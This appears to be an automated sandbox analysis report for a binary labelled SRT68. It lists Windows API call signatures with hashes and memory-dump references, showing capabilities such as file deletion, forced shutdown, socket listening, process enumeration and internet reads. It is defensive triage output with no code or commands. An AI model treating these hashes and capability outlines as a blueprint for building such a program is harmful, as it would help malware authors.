                                                                      • Opcode ID: 2dafe8cc2a5f3b6c0ea4c4577722de3f91e57f63eb5998ecd5591b7693930b26
                                                                      • Instruction ID: 2bf4f24f8752b662f9ad23c676ca7daa1ca69581538781f8d56fa87e32a001ae
                                                                      • Opcode Fuzzy Hash: 2dafe8cc2a5f3b6c0ea4c4577722de3f91e57f63eb5998ecd5591b7693930b26
                                                                      • Instruction Fuzzy Hash: 6941E07180020BAFEF61EF68CC49AEEBBB4FF05350F14409AE985A3191DB359A84DF50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: c9ef0eb2d13b795c23cde51e1806515ce6a4ba18bba470b138331c2659683db5
                                                                      • Instruction ID: 8405206fad9e270e12bf72914d91ed2ac0722557f94aadbda43088234a9cc45f
                                                                      • Opcode Fuzzy Hash: c9ef0eb2d13b795c23cde51e1806515ce6a4ba18bba470b138331c2659683db5
                                                                      • Instruction Fuzzy Hash: 5F129B70A0060ADFDF14DFA5C981AEEB7F5FF48310F104529E846E7251EB3AA915EB50
                                                                      APIs
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                        • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 01003B89
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 01003BD9
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 01003BEA
                                                                      • FindClose.KERNEL32(00000000), ref: 01003C01
                                                                      • FindClose.KERNEL32(00000000), ref: 01003C0A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 9cbb46caf6486ed5eb38368d9713633468e27462e7963c49c754f2ca40454d93
                                                                      • Instruction ID: 27a1480aa44e44c3ecbd10981aa19181102e12c95e7c5d13a74a9fc23d416237
                                                                      • Opcode Fuzzy Hash: 9cbb46caf6486ed5eb38368d9713633468e27462e7963c49c754f2ca40454d93
                                                                      • Instruction Fuzzy Hash: E9317C710083859FD316EF24DC91DAFBBE8BE96214F404D1DF4D586192EB29DA08DB62
                                                                      APIs
                                                                        • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                        • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                        • Part of subcall function 00FF87E1: GetLastError.KERNEL32 ref: 00FF8865
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 010051F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-194228
                                                                      • Opcode ID: 6f942d3e2bf1eb797f76696e46b4f32783daea79fb4a5a4fbbddea1d8e70f908
                                                                      • Instruction ID: 42d4a71b61fd76e3d1c1b3781746222ed607c5c0e96b30ef608f7976db1dc27d
                                                                      • Opcode Fuzzy Hash: 6f942d3e2bf1eb797f76696e46b4f32783daea79fb4a5a4fbbddea1d8e70f908
                                                                      • Instruction Fuzzy Hash: 84017B35791216ABF77A266C9C8AFBB72A8EF07380F100560FEC3E20C2D9551C008E90
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010162DC
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010162EB
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 01016307
                                                                      • listen.WSOCK32(00000000,00000005), ref: 01016316
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 01016330
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 01016344
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                      • String ID:
                                                                      • API String ID: 1279440585-0
                                                                      • Opcode ID: 1e48c39b159af124dd0fb8d02c1c6ec22c39770a09622a6cfe901af3dbb8dc44
                                                                      • Instruction ID: 70f6fdb9a06190fe1b5f68eb3902889e250f3f3c3f5fe2230ff9cb83d3bdf0c1
                                                                      • Opcode Fuzzy Hash: 1e48c39b159af124dd0fb8d02c1c6ec22c39770a09622a6cfe901af3dbb8dc44
                                                                      • Instruction Fuzzy Hash: 8B21F2702002059FCB20EF68CC45A6EB7F8EF45320F248258E996E7395CBB9AD01DB61
                                                                      APIs
                                                                        • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                        • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                      • _memmove.LIBCMT ref: 00FF0258
                                                                      • _memmove.LIBCMT ref: 00FF036D
                                                                      • _memmove.LIBCMT ref: 00FF0414
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1300846289-0
                                                                      • Opcode ID: 21c88c6d637a80b38bf28664c5561fb94ae78469d5a6b80d339aca4d70dc3004
                                                                      • Instruction ID: fdd47070f93ac904e1c825d2fc1e02fba07c7ae59848f0192ec23648cbcc4d57
                                                                      • Opcode Fuzzy Hash: 21c88c6d637a80b38bf28664c5561fb94ae78469d5a6b80d339aca4d70dc3004
                                                                      • Instruction Fuzzy Hash: 3402D0B1E00209DBCF04DF65D982ABEBBB5EF44310F148069E90ADB255EF39D911EB91
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FA19FA
                                                                      • GetSysColor.USER32(0000000F), ref: 00FA1A4E
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00FA1A61
                                                                        • Part of subcall function 00FA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FA12D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ColorProc$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 3744519093-0
                                                                      • Opcode ID: 070a6ceef8ad15ababdf7021e55c1766a8c71c112a15eb5c7a23b1fec9b611ff
                                                                      • Instruction ID: c3e663edd78890bb2f64e6557a88e02d1af836faf53754892dbc950fbb91915e
                                                                      • Opcode Fuzzy Hash: 070a6ceef8ad15ababdf7021e55c1766a8c71c112a15eb5c7a23b1fec9b611ff
                                                                      • Instruction Fuzzy Hash: EDA139F2506596FAE638AE288C54EBF355DFF473A1F1B010AF542D6291CA2D8D01F272
                                                                      APIs
                                                                        • Part of subcall function 01017D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01017DB6
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0101679E
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010167C7
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 01016800
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0101680D
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 01016821
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 99427753-0
                                                                      • Opcode ID: c1bbb96f209f7b54e0e0f32b50e00ca9fdc7a440d641fe31455b71114a610f01
                                                                      • Instruction ID: 6cfb7f1789635b535ada9dd10bad53bc1e129618d9b8584ed97c0d503905c283
                                                                      • Opcode Fuzzy Hash: c1bbb96f209f7b54e0e0f32b50e00ca9fdc7a440d641fe31455b71114a610f01
                                                                      • Instruction Fuzzy Hash: D141C2B5A00210AFDB20BF248C86F6E77E8AF06754F44856CF955AB3C2DABC9D019791
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: b2b437dcf21eb78ce7e3cdb281c24e189f59d18302cb570cd24c4c53fcde7525
                                                                      • Instruction ID: 670a0f23cae3ec4601a8a73cd6053e49a11ea6c80efead6be667c0108bb3f382
                                                                      • Opcode Fuzzy Hash: b2b437dcf21eb78ce7e3cdb281c24e189f59d18302cb570cd24c4c53fcde7525
                                                                      • Instruction Fuzzy Hash: 7A11E7717001216FEB315F2ADC44AAEBBE9FF457A1F548068F9C5D3241CBB8D8018BA8
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FF80C0
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FF80CA
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FF80D9
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FF80E0
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FF80F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: bd4a7b93057980619cdbcd1ef3a8a94ff87aef6d61f12688fce9da9daf9d447b
                                                                      • Instruction ID: 578e9a5683c6ad83ee1a43e7ad780f598e95dbb9a1a9d0869647d459ca5e1c0e
                                                                      • Opcode Fuzzy Hash: bd4a7b93057980619cdbcd1ef3a8a94ff87aef6d61f12688fce9da9daf9d447b
                                                                      • Instruction Fuzzy Hash: 3DF04431640205AFDB301E65DC8DE773BBCEF457E5B600115F645C6250CB659C42DB60
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 0100C432
                                                                      • CoCreateInstance.OLE32(01032D6C,00000000,00000001,01032BDC,?), ref: 0100C44A
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • CoUninitialize.OLE32 ref: 0100C6B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                      • String ID: .lnk
                                                                      • API String ID: 2683427295-24824748
                                                                      • Opcode ID: 560cf9a0dc72b05bc1180724e91f81d568908c00de011e5880ff9217ad2e72d6
                                                                      • Instruction ID: 67e449088993bf2f5256eb27139dbd7f0f63f0c85d530651fbf58c068432dbe7
                                                                      • Opcode Fuzzy Hash: 560cf9a0dc72b05bc1180724e91f81d568908c00de011e5880ff9217ad2e72d6
                                                                      • Instruction Fuzzy Hash: 8FA13AB1108205AFD700EF54CC81EABB7ECEF89354F00492CF1959B1A2DBB5EA09CB52
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4AD0), ref: 00FA4B45
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FA4B57
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: 6c93e1cbb7fff1de9fc5b505fb4092ef12305daac6de52cb4339b59340677e09
                                                                      • Instruction ID: ebc6d9139b383b5e8a6f53b48b60b613de144aab02347c3165f29fce8eb69632
                                                                      • Opcode Fuzzy Hash: 6c93e1cbb7fff1de9fc5b505fb4092ef12305daac6de52cb4339b59340677e09
                                                                      • Instruction Fuzzy Hash: EAD01274A10723CFD7309F32D828B06B6F4AF867D1B21882DD4C5D6100D7B4E880C764
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 674341424-0
                                                                      • Opcode ID: 91ff10788f18e8d2e89022a1b4e990ea0d4bfd997d61c8d8aee2ce4f5d4df0c6
                                                                      • Instruction ID: 08c702879bec1227a199222c127bf9b3515c2ac70390ddda464b6b660e7b62ea
                                                                      • Opcode Fuzzy Hash: 91ff10788f18e8d2e89022a1b4e990ea0d4bfd997d61c8d8aee2ce4f5d4df0c6
                                                                      • Instruction Fuzzy Hash: 6022BC71A083419FC724DF25C881BAFB7E4AF85750F14492CF88A97291DB79E904EF92
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0101EE3D
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0101EE4B
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0101EF0B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0101EF1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                      • String ID:
                                                                      • API String ID: 2576544623-0
                                                                      • Opcode ID: 97a41d3164c7024e0ddc446e2201794add6b67a88f7c90242ff6bf7044a72acd
                                                                      • Instruction ID: 8b9c27e389488a9a139d51132f80ad4b3ff87cb0337bb0e80bc079e58a6f866f
                                                                      • Opcode Fuzzy Hash: 97a41d3164c7024e0ddc446e2201794add6b67a88f7c90242ff6bf7044a72acd
                                                                      • Instruction Fuzzy Hash: 59517EB15083019FD321EF24CC81E6BB7E8EF99750F50482DF99597291EB78E908DB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID:
                                                                      • API String ID: 3964851224-0
                                                                      • Opcode ID: 971384b3e65a9c85d70fb69b71c2f2342d868a3f688b173e31599dc20f861438
                                                                      • Instruction ID: 8c231c3f5693b8b76a500ba84f1866371867c8867b8f24bfb631d84414d0e412
                                                                      • Opcode Fuzzy Hash: 971384b3e65a9c85d70fb69b71c2f2342d868a3f688b173e31599dc20f861438
                                                                      • Instruction Fuzzy Hash: CA926771A083418FD720DF15C480B6BB7E1BF89314F14896DE88A9B262DB75EC45EF92
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FFE628
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: 8785a08b753f55fee2cbf299c4635e120bbca3a8e455963fafa330f0d97e4919
                                                                      • Instruction ID: 149df8bf2543ee9bca8f0b22553a161481a48c4b683cbf9f2434c7ef7a8ab6e6
                                                                      • Opcode Fuzzy Hash: 8785a08b753f55fee2cbf299c4635e120bbca3a8e455963fafa330f0d97e4919
                                                                      • Instruction Fuzzy Hash: FD322575A007099FD728DF19C481A6AB7F1FF48320B15C46EE99ADB3B1EB70A941CB44
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0101180A,00000000), ref: 010123E1
                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01012418
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                      • String ID:
                                                                      • API String ID: 599397726-0
                                                                      • Opcode ID: c6fda709ed6f027e5c01e4aafe66e724c6efeb9752376184ff635d14400ae359
                                                                      • Instruction ID: 40fcfb9d35cb994f4fadb2efd0f30e87e7003c9f165f655af39c649db3ae41bc
                                                                      • Opcode Fuzzy Hash: c6fda709ed6f027e5c01e4aafe66e724c6efeb9752376184ff635d14400ae359
                                                                      • Instruction Fuzzy Hash: FC41F57190420ABFEB20DE99DC81FBFB7FCEB40314F20806EF681A6145DB799E419660
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0100B343
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0100B39D
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0100B3EA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
